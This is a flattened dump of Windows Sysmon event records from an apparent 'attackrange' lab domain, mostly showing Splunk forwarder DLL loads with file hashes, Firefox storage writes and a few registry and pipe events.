Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EBfalsetrue 23542300x800000000000000057343969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.248{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=8D04A3688B9D9310908DD8306CFEDECA,SHA256=27318DCFA5C76A15B2D1F5292DB59514F574AA1D9086E4B458A185FFA73C78B4falsetrue 12241200x800000000000000057343968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:06.095{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057343967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:06.079{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 23542300x800000000000000021219217Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:07.622{AD5E2759-5433-6143-1200-00000000F101}292NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=EA96CC8D6624300F306478AFE664102E,SHA256=B26CDDCF2CBAF63C168EE3CBAAA030AD31E0DCE7101041A6E093CABA8E8910E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219216Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:07.386{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9264FC28040D11F7EF050FDF1993CB,SHA256=831906BE81E1983DFA2BA3D5715932ABD8F6474D47DC88DF4BE85FA6A40E1CD1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.814{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057344026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057344003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057344002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057344000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057343999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057343998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057343997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057343996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x800000000000000057343995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057343994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057343993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057343992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057343991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:07.799{8B6011A9-5ACB-618E-31F3-04000000F101}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 